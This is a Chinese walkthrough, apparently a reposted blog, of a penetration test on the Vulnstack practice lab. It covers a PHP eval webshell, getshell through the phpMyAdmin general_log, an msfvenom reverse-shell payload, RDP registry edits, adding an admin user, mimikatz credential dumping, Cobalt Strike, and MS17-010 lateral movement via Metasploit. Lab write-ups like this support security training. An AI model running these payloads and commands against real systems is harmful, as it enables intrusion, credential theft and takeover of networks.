vlunstack是紅日安全團隊出品的一個實戰環境,具體介紹請訪問:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
拓撲結構大體如下:
靶機下載地址:https://pan.baidu.com/share/init?surl=nC6V8e_EuKfaLb2IuEbe7w
提取碼:n1u2
開機密碼:hongrisec@2019
因為要搭建一個內網環境,因此需要將虛擬機與外網隔絕,在VMware中可以通過虛擬機設定中的網路配接器來設定,
Windows7(內配有phpstudy web環境):
域內主機Win2K3 Metasploitable:
域控Windows 2008:
外網初探
web服務器win7的模擬外網ip(192.168.72.129),打開頁面后發現是一個Yxcms的站點
直接上御劍先掃一波康康有沒有可疑的資訊~
發現有很多目錄,打開發現這個cms存在目錄遍歷漏洞:
我們在右側公告欄發現敏感資訊泄露:后臺地址請在網址后面加上/index.php?r=admin進入, 后臺的用戶名:admin;密碼:123456,這樣我們直接進入后臺康康能不能getshell,
然后我們投機取巧谷歌大法搜一搜康康這個cms有沒有漏洞,搜索后發現YXcms 1.4.7 存在任意檔案寫入
直接在這里寫入一句話php木馬 <?php @eval($_POST['cmd']); ?>
然后我們根據之前目錄遍歷漏洞找到flag.php
命令執行是一個管理員權限,到這里可以直接用shell連接工具就行,然后還有一個方法是通過phpMyAdmin,默認的用戶名,密碼:root
phpmyadmin后臺getshell的幾種方式:
1、select into outfile直接寫入
2、開啟全域日志getshell
3、使用慢查詢日志getsehll
4、使用錯誤日志getshell
5、利用phpmyadmin4.8.x本地檔案包含漏洞getshell
執行以下sql陳述句
show variables like ‘%secure%’;
發現沒有寫入權限,無法用select into outfile方法直接寫入shell,再來看一下第二種方法,利用開啟全域日志general_log去getshell,show variables like ‘%general%’;查看日志狀態
當開啟general時,所執行的sql陳述句都會出現在stu1.log檔案中,那么,如果修改generallogfile的值,那么所執行的sql陳述句就會對應生成對應的檔案中,進而getshell,
1.SET GLOBAL general_log=‘on’; 開啟日志
2.set global general_log_file=‘C:/phpstudy/www/yxcms/shell.php’;# 設定日志位置為網站目錄
3.將一句話木馬寫入shell.php檔案中 SELECT '<?php eval($_POST["cmd"]);?>'
然后使用蟻劍連接
殺入內網
發現我們剛剛拿到的shell是一個administrator權限的shell,這樣我們就不用提權什么的了
查看3389是否開啟(遠程桌面的服務埠)
發現3389并沒有開啟,我們使用以下命令開啟它:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
嘗試直接遠程桌面連接卻失敗了,可能是防火墻的原因
這時候我的思路就是制作一個msf的后門上傳上去運行,然后反彈一個msf的shell回來,嘗試關閉防火墻
生成一個后門檔案test.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.72.128 LPORT=6666 -f exe -o test.exe
msf大法
msfconsole (運行msfconsole)
msf>use exploit/multi/handler (選擇模塊)
輸入命令show payloads會顯示出有效的攻擊載荷,比如shell_reverse_tcp,
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
set lhost 加ip地址
set lport 加埠號
輸入命令show payloads會顯示出有效的攻擊載荷
然后上傳test.exe并運行它
成功上線
getsystem //自動嘗試提權
getuid //當前會話用戶身份
run post/windows/manage/enable_rdp //關閉防火墻
關閉掉防火墻后,添加用戶嘗試遠程連接上去
添加用戶 net user test asd123ASD! /add #添加一個用戶
net localgroup administrators test /add #將用戶添加到管理員組
#登陸只能選擇STU1域 #STU1/
為了方便后面的內網滲透,所以上傳一個CS的shell并且反彈
Cobalt Strike 一款以Metasploit為基礎的GUI框架式滲透測驗工具,集成了埠轉發、服務掃描,自動化溢位,多模式埠監聽,exe、powershell木馬生成等,
釣魚攻擊包括:站點克隆,目標資訊獲取,java執行,瀏覽器自動攻擊等,
主要用于團隊作戰,可謂是團隊滲透神器,能讓多個攻擊者同時連接到團體服務器上,共享攻擊資源與目標資訊和sessions, 作為一款協同APT工具,針對內網的滲透測驗和作為apt的控制終端功能,使其變成眾多APT組織的首選,
使用的大致流程是:創建團隊服務器->客戶端連接團隊服務器->創建監聽器->生成payload對應監聽器->靶機運行后門上線->后滲透
運行cs需要先有Java環境
生成cs shell并運行
hashdump
mimitakz獲取到administrator(域管理員)的明文密碼
接下來我們資訊收集,對域中的其他主機進行內網滲透,
Ladon 192.168.52.0/24 OnlinePC # 多協議探測存活主機(IP、機器名、MAC地址、制造商)
Ladon 192.168.52.0/24 OsScan #多協議識別作業系統 (IP、機器名、作業系統版本、開放服務)
192.168.52.138 域控Windows 2008
192.168.52.141 域內主機Win2K3 Metasploitable
橫向移動
橫向滲透概念:
橫向滲透攻擊技術是復雜網路攻擊中廣泛使用的一種技術,特別是在高級持續威脅(Advanced Persistent Threats,APT)中更加熱衷于使用這種攻擊方法,攻擊者可以利用這些技術,以被攻陷的系統為跳板,訪問其他主機,獲取包括郵箱、共享檔案夾或者憑證資訊在內的敏感資源,攻擊者可以利用這些敏感資訊,進一步控制其他系統、提升權限或竊取更多有價值的憑證,借助此類攻擊,攻擊者最終可能獲取域控的訪問權限,完全控制基于Windows系統的基礎設施或與業務相關的關鍵賬戶,
在提權后,我們可以用mimikatz dump目標機的憑證,并進行內網橫向移動
SMB Beacon使用命名管道通過父級Beacon進行通訊,當兩個Beacons鏈接后,子Beacon從父Beacon獲取到任務并發送,因為鏈接的Beacons使用Windows命名管道進行通信,此流量封裝在SMB協議中,所以SMB Beacon相對隱蔽,繞防火墻時可能發揮奇效,
psexec橫向移動
竊取token
在行程串列中,尋找以域管理員身份運行的行程,并選定進行steal token,如果成功,則會回傳域管權限的beacon
這里竊取token 然后psexec橫向移動域內主機Win2K3,ip為192.168.52.141,這是一種思路,由于失敗然后我們用msf進行滲透
我們先添加一下路由
run autoroute -s 192.168.52.0/24
run autoroute -p
探測是否存在ms17_010
use auxiliary/scanner/smb/smb_ms17_010
set rhosts 192.168.52.141
run
存在漏洞,但是實際攻擊失敗了
選擇下面的模塊
use exploit/windows/smb/ms17_010_psexec
set rhosts 192.168.52.141
set payload windows/meterpreter/bind_tcp
拿到系統權限
開啟2003遠程桌面
use auxiliary/admin/smb/ms17_010_command
set rhosts 192.168.52.141
set COMMAND REG ADD HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal\* \*Server /v fDenyTSConnections /t REG_DWIRD /d 00000000 /f
遠程登陸Win2K3 Metasploitable成功
小白滲透不喜勿噴~
學大佬的方法 網址如下
https://www.bilibili.com/read/cv6476215/
https://www.sohu.com/a/382017102_100014967
http://www.secwk.com/2019/11/05/13705/
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/264444.html
標籤:其他